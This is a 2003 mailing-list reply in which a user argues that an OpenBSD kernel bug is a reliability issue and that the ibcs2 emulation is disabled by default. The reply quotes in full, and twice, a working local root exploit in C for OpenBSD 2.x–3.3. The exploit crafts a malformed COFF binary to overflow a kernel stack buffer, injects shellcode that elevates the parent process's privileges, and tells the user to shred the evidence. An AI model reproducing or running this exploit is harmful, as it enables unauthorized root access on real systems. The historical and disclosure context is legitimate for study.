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Re: OpenBSD kernel holes ...

I may be wrong here, but I don't think that any of the kern.emul.* 
executable emulations are actually enabled on a default install. I have
installed openbsd in environments requiring one of these since 3.2 and
have had to specifically enable them every time. COMPAT_* are compiled in
the default kernel, but are turned of via sysctl in the default install.

This is not to say that OpenBSD is in any way a perfectly stable environment,
in my experience, I have still managed to crash OpenBSD from userland time to
time. I don't really recommend it as a public shell box without studying its
configuration and understanding how to secure a unix box, or a network for
that matter. IMHO, the slogan should be "More secure by default".

This does fall under reliability fix category, though, since it isn't really 
a security issue, the bug puts the system into one of its most secure states:
halted. Well, that is as long as youve disabled the kdb, which you should have
on a production box.

On Tue, Nov 18, 2003 at 01:54:39PM -0500, noir@xxxxxxxxxxxxx wrote, and it was 
> once again i am honored to present you a generic and robust way to own
> OpenBSD 2.x-3.x, enjoy ;)
> it is quite funny to name ring 0 overflow patches as "reliability fixes".
> who does theo thinks he is fooling ? kiddies in his cult ?
> you can patch your useless/old openbsd systems by visiting;
> http://www.gentoo.org
> http://www.grsecurity.net
> - noir
> from http://www.wideopenbsd.org/errata.html
> All architectures
>      005: RELIABILITY FIX: November 4, 2003
>      It is possible for a local user to cause a system panic by executing
>      a specially crafted binary with an invalid header.
>      A source code patch exists which remedies the problem.
> reliability ??? ehh ;-P yeah yeah right!

> /** OpenBSD 2.x - 3.3                                          **/
> /** exec_ibcs2_coff_prep_zmagic() kernel stack overflow                **/ 
> /** note: ibcs2 binary compatibility with SCO and ISC is enabled **/
> /** in the default install                                       **/
> /**   Copyright Feb 26 2003 Sinan "noir" Eren                  **/ 
> /**   noir@xxxxxxxxxxx | noir@xxxxxxxxxxxxx                    **/
> /**   greets to brother nahual for making this usefull!        **/ 
> #include <stdio.h>
> #include <sys/types.h>
> #include <fcntl.h>
> #include <unistd.h>
> #include <sys/param.h>
> #include <sys/sysctl.h>
> #include <sys/signal.h>
> //#include "ibcs2_exec.h"
> /* kernel_sc.s shellcode */
> /* much improved the opcode search, fixed the stupid logic bug! */
> unsigned char shellcode[] =
> "\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe"
> "\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89"
> "\x42\x04\x8b\x51\x14\x89\x42\x0c\x8d\x6c\x24\x68\x0f\x01\x4f\x04\x8b"
> "\x5f\x06\x8b\x93\x00\x04\x00\x00\x8b\x8b\x04\x04\x00\x00\xc1\xe9\x10"
> "\xc1\xe1\x10\xc1\xe2\x10\xc1\xea\x10\x09\xca\x31\xc9\x41\x8a\x1c\x0a"
> "\x80\xfb\xe8\x75\xf7\x8d\x1c\x0a\x41\x8b\x0c\x0a\x83\xc1\x05\x01\xd9"
> "\x89\xcf\xb0\xff\xfc\xb9\xff\xff\xff\xff\xf2\xae\x8a\x1f\x80\xfb\xd0"
> "\x75\xef\x47\x31\xc0\x57\xc3";
> /* do not use! */
> /* 
> silvio gotta get his brain together and understand why sometimes
> you need to return to kernel code rather than setting the selectors
> pushing ss,esp,eflag,cs,eip and do an iret! 
> well, aloha?? vnode locks being held ? mutex locks being held ? 
> you have to return to the kernel code that unlocks the syncronization
> objects
> */
> unsigned char iret_shellcode[] =
> "\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe"
> "\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89"
> "\x42\x04\x8b\x51\x14\x89\x42\x0c\xfa\x6a\x1f\x07\x6a\x1f\x1f\x6a\x00"
> "\x5f\x6a\x00\x5e\x68\x00\xd0\xbf\xdf\x5d\x6a\x00\x5b\x6a\x00\x5a\x6a"
> "\x00\x59\x6a\x00\x58\x6a\x1f\x68\x00\xd0\xbf\xdf\x68\x87\x02\x00\x00"
> "\x6a\x17";
> unsigned char pusheip[] =
> "\x68\x00\x00\x00\x00"; /* fill eip */
> unsigned char iret[] =
> "\xcf";
> unsigned char exitsh[] =
> "\x31\xc0\xcd\x80\xcc"; /* xorl %eax,%eax, int $0x80, int3 */
> #define ZERO(p) memset(&p, 0x00, sizeof(p))
> /*
>  * COFF file header
>  */
> struct coff_filehdr {
>     u_short     f_magic;        /* magic number */
>     u_short     f_nscns;        /* # of sections */
>     long        f_timdat;       /* timestamp */
>     long        f_symptr;       /* file offset of symbol table */
>     long        f_nsyms;        /* # of symbol table entries */
>     u_short     f_opthdr;       /* size of optional header */
>     u_short     f_flags;        /* flags */
> };
> /* f_magic flags */
> #define COFF_MAGIC_I386 0x14c
> /* f_flags */
> #define COFF_F_RELFLG   0x1
> #define COFF_F_EXEC     0x2
> #define COFF_F_LNNO     0x4
> #define COFF_F_LSYMS    0x8
> #define COFF_F_SWABD    0x40
> #define COFF_F_AR16WR   0x80
> #define COFF_F_AR32WR   0x100
> /*
>  * COFF system header
>  */
> struct coff_aouthdr {
>     short       a_magic;
>     short       a_vstamp;
>     long        a_tsize;
>     long        a_dsize;
>     long        a_bsize;
>     long        a_entry;
>     long        a_tstart;
>     long        a_dstart;
> };
> /* magic */
> #define COFF_ZMAGIC     0413
> /*
>  * COFF section header
>  */
> struct coff_scnhdr {
>     char        s_name[8];
>     long        s_paddr;
>     long        s_vaddr;
>     long        s_size;
>     long        s_scnptr;
>     long        s_relptr;
>     long        s_lnnoptr;
>     u_short     s_nreloc;
>     u_short     s_nlnno;
>     long        s_flags;
> };
> /* s_flags */
> #define COFF_STYP_TEXT          0x20
> #define COFF_STYP_DATA          0x40
> #define COFF_STYP_SHLIB         0x800
> void get_proc(pid_t, struct kinfo_proc *);
> void sig_handler();
> int
> main(int argc, char **argv)
> {
>   u_int i, fd, debug = 0;
>   u_char *ptr, *shptr;
>   u_long *lptr;
>   u_long pprocadr, offset;
>   struct kinfo_proc kp;
>   char *args[] = { "./ibcs2own", NULL};
>   char *envs[] = { "RIP=theo", NULL};
>   //COFF structures
>   struct coff_filehdr fhdr;
>   struct coff_aouthdr ahdr;
>   struct coff_scnhdr  scn0, scn1, scn2;
>    if(argv[1]) {
>       if(!strncmp(argv[1], "-v", 2)) 
>               debug = 1;
>       else { 
>             printf("-v: verbose flag only\n");
>             exit(0);
>             }
>     }
>     ZERO(fhdr);
>     fhdr.f_magic = COFF_MAGIC_I386;
>     fhdr.f_nscns = 3; //TEXT, DATA, SHLIB
>     fhdr.f_timdat = 0xdeadbeef;
>     fhdr.f_symptr = 0x4000;
>     fhdr.f_nsyms = 1;
>     fhdr.f_opthdr = sizeof(ahdr); //AOUT opt header size
>     fhdr.f_flags = COFF_F_EXEC;
>     ZERO(ahdr);
>     ahdr.a_magic = COFF_ZMAGIC;
>     ahdr.a_tsize = 0;
>     ahdr.a_dsize = 0; 
>     ahdr.a_bsize = 0;
>     ahdr.a_entry = 0x10000;
>     ahdr.a_tstart = 0;
>     ahdr.a_dstart = 0;
>     ZERO(scn0);
>     memcpy(&scn0.s_name, ".text", 5);
>     scn0.s_paddr = 0x10000;
>     scn0.s_vaddr = 0x10000;
>     scn0.s_size = 4096;
>     scn0.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3); 
>     //file offset of .text segment
>     scn0.s_relptr = 0;
>     scn0.s_lnnoptr = 0;
>     scn0.s_nreloc = 0;
>     scn0.s_nlnno = 0;
>     scn0.s_flags = COFF_STYP_TEXT;
>     ZERO(scn1);
>     memcpy(&scn1.s_name, ".data", 5);
>     scn1.s_paddr = 0x10000 - 4096;
>     scn1.s_vaddr = 0x10000 - 4096;
>     scn1.s_size = 4096;
>     scn1.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 4096; 
>     //file offset of .data segment
>     scn1.s_relptr = 0;
>     scn1.s_lnnoptr = 0;
>     scn1.s_nreloc = 0;
>     scn1.s_nlnno = 0;
>     scn1.s_flags = COFF_STYP_DATA;
>     ZERO(scn2);
>     memcpy(&scn2.s_name, ".shlib", 6);
>     scn2.s_paddr = 0;
>     scn2.s_vaddr = 0;
>     scn2.s_size = 0xb0; //HERE IS DA OVF!!! static_buffer = 128
>     scn2.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 2*4096; 
>     //file offset of .data segment
>     scn2.s_relptr = 0;
>     scn2.s_lnnoptr = 0;
>     scn2.s_nreloc = 0;
>     scn2.s_nlnno = 0;
>     scn2.s_flags = COFF_STYP_SHLIB;
>     offset = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 3*4096;
>     ptr = (char *) malloc(offset);
>     if(!ptr) { 
>               perror("malloc");
>               exit(-1);
>     }
>     memset(ptr, 0xcc, offset);  /* fill int3 */
>     /* copy sections */
>     offset = 0;
>     memcpy(ptr, (char *) &fhdr, sizeof(fhdr));
>     offset += sizeof(fhdr);
>     memcpy(ptr+offset, (char *) &ahdr, sizeof(ahdr)); 
>     offset += sizeof(ahdr);
>     memcpy(ptr+offset, (char *) &scn0, sizeof(scn0));
>     offset += sizeof(scn0);
>     memcpy(ptr+offset, &scn1, sizeof(scn1));
>     offset += sizeof(scn1);
>     memcpy(ptr+offset, (char *) &scn2, sizeof(scn2));
>     offset += sizeof(scn2);
>     lptr = (u_long *) ((char *)ptr + sizeof(fhdr) + sizeof(ahdr) + \
>            (sizeof(scn0) * 3) + 4096 + 4096 + 0xb0 - 8);
>     shptr = (char *) malloc(4096);
>     if(!shptr) {
>               perror("malloc");
>               exit(-1);
>     }
>     if(debug)
>       printf("payload adr: 0x%.8x\t", shptr);
>     memset(shptr, 0xcc, 4096);
>     get_proc((pid_t) getppid(), &kp);
>     pprocadr = (u_long) kp.kp_eproc.e_paddr;
>     if(debug)
>       printf("parent proc adr: 0x%.8x\n", pprocadr); 
>     *lptr++ = 0xdeadbeef;
>     *lptr = (u_long) shptr;
>     shellcode[5] = pprocadr & 0xff;
>     shellcode[6] = (pprocadr >> 8) & 0xff;
>     shellcode[7] = (pprocadr >> 16) & 0xff;
>     shellcode[8] = (pprocadr >> 24) & 0xff;
>     memcpy(shptr, shellcode, sizeof(shellcode)-1);
>     unlink("./ibcs2own");
>     if((fd = open("./ibcs2own", O_CREAT^O_RDWR, 0755)) < 0) {
>               perror("open");
>               exit(-1);
>       }
>     write(fd, ptr, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0) * 3) + 4096 + 
> 4096 + 4096);
>     close(fd);
>     free(ptr);
>     signal(SIGSEGV, (void (*)())sig_handler);
>     signal(SIGILL, (void (*)())sig_handler);
>     signal(SIGSYS, (void (*)())sig_handler);
>     signal(SIGBUS, (void (*)())sig_handler);
>     signal(SIGABRT, (void (*)())sig_handler);
>     signal(SIGTRAP, (void (*)())sig_handler);
>     printf("\nDO NOT FORGET TO SHRED ./ibcs2own\n");
>     execve(args[0], args, envs);
>     perror("execve");
> }
> void
> sig_handler()
> {
>    _exit(0);
> }
> void
> get_proc(pid_t pid, struct kinfo_proc *kp)
> {
>    u_int arr[4], len;
>         arr[0] = CTL_KERN;
>         arr[1] = KERN_PROC;
>         arr[2] = KERN_PROC_PID;
>         arr[3] = pid;
>         len = sizeof(struct kinfo_proc);
>         if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
>                 perror("sysctl");
>                 fprintf(stderr, "this is an unexpected error, rerun!\n");
>                 exit(-1);
>         }
> }
> /** OpenBSD 2.x - 3.3                                          **/
> /** exec_ibcs2_coff_prep_zmagic() kernel stack overflow                **/ 
> /** note: ibcs2 binary compatibility with SCO and ISC is enabled **/
> /** in the default install                                       **/
> /**   Copyright Feb 26 2003 Sinan "noir" Eren                  **/ 
> /**   noir@xxxxxxxxxxx | noir@xxxxxxxxxxxxx                    **/
> /**   greets to brother nahual for making this usefull!        **/ 
> #include <stdio.h>
> #include <sys/types.h>
> #include <fcntl.h>
> #include <unistd.h>
> #include <sys/param.h>
> #include <sys/sysctl.h>
> #include <sys/signal.h>
> //#include "ibcs2_exec.h"
> /* kernel_sc.s shellcode */
> /* much improved the opcode search, fixed the stupid logic bug! */
> unsigned char shellcode[] =
> "\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe"
> "\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89"
> "\x42\x04\x8b\x51\x14\x89\x42\x0c\x8d\x6c\x24\x68\x0f\x01\x4f\x04\x8b"
> "\x5f\x06\x8b\x93\x00\x04\x00\x00\x8b\x8b\x04\x04\x00\x00\xc1\xe9\x10"
> "\xc1\xe1\x10\xc1\xe2\x10\xc1\xea\x10\x09\xca\x31\xc9\x41\x8a\x1c\x0a"
> "\x80\xfb\xe8\x75\xf7\x8d\x1c\x0a\x41\x8b\x0c\x0a\x83\xc1\x05\x01\xd9"
> "\x89\xcf\xb0\xff\xfc\xb9\xff\xff\xff\xff\xf2\xae\x8a\x1f\x80\xfb\xd0"
> "\x75\xef\x47\x31\xc0\x57\xc3";
> /* do not use! */
> /* 
> silvio gotta get his brain together and understand why sometimes
> you need to return to kernel code rather than setting the selectors
> pushing ss,esp,eflag,cs,eip and do an iret! 
> well, aloha?? vnode locks being held ? mutex locks being held ? 
> you have to return to the kernel code that unlocks the syncronization
> objects
> */
> unsigned char iret_shellcode[] =
> "\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe"
> "\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89"
> "\x42\x04\x8b\x51\x14\x89\x42\x0c\xfa\x6a\x1f\x07\x6a\x1f\x1f\x6a\x00"
> "\x5f\x6a\x00\x5e\x68\x00\xd0\xbf\xdf\x5d\x6a\x00\x5b\x6a\x00\x5a\x6a"
> "\x00\x59\x6a\x00\x58\x6a\x1f\x68\x00\xd0\xbf\xdf\x68\x87\x02\x00\x00"
> "\x6a\x17";
> unsigned char pusheip[] =
> "\x68\x00\x00\x00\x00"; /* fill eip */
> unsigned char iret[] =
> "\xcf";
> unsigned char exitsh[] =
> "\x31\xc0\xcd\x80\xcc"; /* xorl %eax,%eax, int $0x80, int3 */
> #define ZERO(p) memset(&p, 0x00, sizeof(p))
> /*
>  * COFF file header
>  */
> struct coff_filehdr {
>     u_short     f_magic;        /* magic number */
>     u_short     f_nscns;        /* # of sections */
>     long        f_timdat;       /* timestamp */
>     long        f_symptr;       /* file offset of symbol table */
>     long        f_nsyms;        /* # of symbol table entries */
>     u_short     f_opthdr;       /* size of optional header */
>     u_short     f_flags;        /* flags */
> };
> /* f_magic flags */
> #define COFF_MAGIC_I386 0x14c
> /* f_flags */
> #define COFF_F_RELFLG   0x1
> #define COFF_F_EXEC     0x2
> #define COFF_F_LNNO     0x4
> #define COFF_F_LSYMS    0x8
> #define COFF_F_SWABD    0x40
> #define COFF_F_AR16WR   0x80
> #define COFF_F_AR32WR   0x100
> /*
>  * COFF system header
>  */
> struct coff_aouthdr {
>     short       a_magic;
>     short       a_vstamp;
>     long        a_tsize;
>     long        a_dsize;
>     long        a_bsize;
>     long        a_entry;
>     long        a_tstart;
>     long        a_dstart;
> };
> /* magic */
> #define COFF_ZMAGIC     0413
> /*
>  * COFF section header
>  */
> struct coff_scnhdr {
>     char        s_name[8];
>     long        s_paddr;
>     long        s_vaddr;
>     long        s_size;
>     long        s_scnptr;
>     long        s_relptr;
>     long        s_lnnoptr;
>     u_short     s_nreloc;
>     u_short     s_nlnno;
>     long        s_flags;
> };
> /* s_flags */
> #define COFF_STYP_TEXT          0x20
> #define COFF_STYP_DATA          0x40
> #define COFF_STYP_SHLIB         0x800
> void get_proc(pid_t, struct kinfo_proc *);
> void sig_handler();
> int
> main(int argc, char **argv)
> {
>   u_int i, fd, debug = 0;
>   u_char *ptr, *shptr;
>   u_long *lptr;
>   u_long pprocadr, offset;
>   struct kinfo_proc kp;
>   char *args[] = { "./ibcs2own", NULL};
>   char *envs[] = { "RIP=theo", NULL};
>   //COFF structures
>   struct coff_filehdr fhdr;
>   struct coff_aouthdr ahdr;
>   struct coff_scnhdr  scn0, scn1, scn2;
>    if(argv[1]) {
>       if(!strncmp(argv[1], "-v", 2)) 
>               debug = 1;
>       else { 
>             printf("-v: verbose flag only\n");
>             exit(0);
>             }
>     }
>     ZERO(fhdr);
>     fhdr.f_magic = COFF_MAGIC_I386;
>     fhdr.f_nscns = 3; //TEXT, DATA, SHLIB
>     fhdr.f_timdat = 0xdeadbeef;
>     fhdr.f_symptr = 0x4000;
>     fhdr.f_nsyms = 1;
>     fhdr.f_opthdr = sizeof(ahdr); //AOUT opt header size
>     fhdr.f_flags = COFF_F_EXEC;
>     ZERO(ahdr);
>     ahdr.a_magic = COFF_ZMAGIC;
>     ahdr.a_tsize = 0;
>     ahdr.a_dsize = 0; 
>     ahdr.a_bsize = 0;
>     ahdr.a_entry = 0x10000;
>     ahdr.a_tstart = 0;
>     ahdr.a_dstart = 0;
>     ZERO(scn0);
>     memcpy(&scn0.s_name, ".text", 5);
>     scn0.s_paddr = 0x10000;
>     scn0.s_vaddr = 0x10000;
>     scn0.s_size = 4096;
>     scn0.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3); 
>     //file offset of .text segment
>     scn0.s_relptr = 0;
>     scn0.s_lnnoptr = 0;
>     scn0.s_nreloc = 0;
>     scn0.s_nlnno = 0;
>     scn0.s_flags = COFF_STYP_TEXT;
>     ZERO(scn1);
>     memcpy(&scn1.s_name, ".data", 5);
>     scn1.s_paddr = 0x10000 - 4096;
>     scn1.s_vaddr = 0x10000 - 4096;
>     scn1.s_size = 4096;
>     scn1.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 4096; 
>     //file offset of .data segment
>     scn1.s_relptr = 0;
>     scn1.s_lnnoptr = 0;
>     scn1.s_nreloc = 0;
>     scn1.s_nlnno = 0;
>     scn1.s_flags = COFF_STYP_DATA;
>     ZERO(scn2);
>     memcpy(&scn2.s_name, ".shlib", 6);
>     scn2.s_paddr = 0;
>     scn2.s_vaddr = 0;
>     scn2.s_size = 0xb0; //HERE IS DA OVF!!! static_buffer = 128
>     scn2.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 2*4096; 
>     //file offset of .data segment
>     scn2.s_relptr = 0;
>     scn2.s_lnnoptr = 0;
>     scn2.s_nreloc = 0;
>     scn2.s_nlnno = 0;
>     scn2.s_flags = COFF_STYP_SHLIB;
>     offset = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 3*4096;
>     ptr = (char *) malloc(offset);
>     if(!ptr) { 
>               perror("malloc");
>               exit(-1);
>     }
>     memset(ptr, 0xcc, offset);  /* fill int3 */
>     /* copy sections */
>     offset = 0;
>     memcpy(ptr, (char *) &fhdr, sizeof(fhdr));
>     offset += sizeof(fhdr);
>     memcpy(ptr+offset, (char *) &ahdr, sizeof(ahdr)); 
>     offset += sizeof(ahdr);
>     memcpy(ptr+offset, (char *) &scn0, sizeof(scn0));
>     offset += sizeof(scn0);
>     memcpy(ptr+offset, &scn1, sizeof(scn1));
>     offset += sizeof(scn1);
>     memcpy(ptr+offset, (char *) &scn2, sizeof(scn2));
>     offset += sizeof(scn2);
>     lptr = (u_long *) ((char *)ptr + sizeof(fhdr) + sizeof(ahdr) + \
>            (sizeof(scn0) * 3) + 4096 + 4096 + 0xb0 - 8);
>     shptr = (char *) malloc(4096);
>     if(!shptr) {
>               perror("malloc");
>               exit(-1);
>     }
>     if(debug)
>       printf("payload adr: 0x%.8x\t", shptr);
>     memset(shptr, 0xcc, 4096);
>     get_proc((pid_t) getppid(), &kp);
>     pprocadr = (u_long) kp.kp_eproc.e_paddr;
>     if(debug)
>       printf("parent proc adr: 0x%.8x\n", pprocadr); 
>     *lptr++ = 0xdeadbeef;
>     *lptr = (u_long) shptr;
>     shellcode[5] = pprocadr & 0xff;
>     shellcode[6] = (pprocadr >> 8) & 0xff;
>     shellcode[7] = (pprocadr >> 16) & 0xff;
>     shellcode[8] = (pprocadr >> 24) & 0xff;
>     memcpy(shptr, shellcode, sizeof(shellcode)-1);
>     unlink("./ibcs2own");
>     if((fd = open("./ibcs2own", O_CREAT^O_RDWR, 0755)) < 0) {
>               perror("open");
>               exit(-1);
>       }
>     write(fd, ptr, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0) * 3) + 4096 + 
> 4096 + 4096);
>     close(fd);
>     free(ptr);
>     signal(SIGSEGV, (void (*)())sig_handler);
>     signal(SIGILL, (void (*)())sig_handler);
>     signal(SIGSYS, (void (*)())sig_handler);
>     signal(SIGBUS, (void (*)())sig_handler);
>     signal(SIGABRT, (void (*)())sig_handler);
>     signal(SIGTRAP, (void (*)())sig_handler);
>     printf("\nDO NOT FORGET TO SHRED ./ibcs2own\n");
>     execve(args[0], args, envs);
>     perror("execve");
> }
> void
> sig_handler()
> {
>    _exit(0);
> }
> void
> get_proc(pid_t pid, struct kinfo_proc *kp)
> {
>    u_int arr[4], len;
>         arr[0] = CTL_KERN;
>         arr[1] = KERN_PROC;
>         arr[2] = KERN_PROC_PID;
>         arr[3] = pid;
>         len = sizeof(struct kinfo_proc);
>         if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
>                 perror("sysctl");
>                 fprintf(stderr, "this is an unexpected error, rerun!\n");
>                 exit(-1);
>         }
> }

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Description: PGP signature